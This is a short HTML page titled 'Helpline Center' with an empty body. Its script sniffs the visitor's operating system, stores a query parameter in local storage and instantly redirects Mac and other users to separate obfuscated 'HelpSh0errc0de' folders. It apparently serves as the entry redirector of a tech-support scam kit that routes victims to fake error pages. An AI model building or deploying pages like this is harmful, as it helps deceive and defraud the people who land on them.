
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Helpline Center</title>
    <script type='text/javascript' src="https://code.jquery.com/jquery-1.4.4.min.js"></script>

    <script>
        function getQueryParam(param) {
            const urlParams = new URLSearchParams(window.location.search);
            return urlParams.get(param);
        }
        function myOperatingSystem() {
            const userAgent = navigator.userAgent;
            let os = "Unknown";
            if (userAgent.indexOf("Win") !== -1) {
                os = "Windows";
            } else if (userAgent.indexOf("Mac") !== -1) {
                os = "MacOS";
            } else if (userAgent.indexOf("Linux") !== -1) {
                os = "Linux";
            } else if (userAgent.indexOf("Android") !== -1) {
                os = "Android";
            } else if (userAgent.indexOf("iOS") !== -1) {
                os = "iOS";
            }
            return os;
        }
        let operatingSystem = myOperatingSystem();
        localStorage.setItem('alpha',getQueryParam('alpha'));
        if(operatingSystem === 'MacOS'){
            window.location.href="Ma0cHelpSh0errc0de030/index.html?Anph="+getQueryParam('Anph');
        }else{
            window.location.href="Wi0nHelpSh0errc0de030/index.html?Anph="+getQueryParam('Anph');
        }



    </script>
</head>
<body>

</body>
</html>
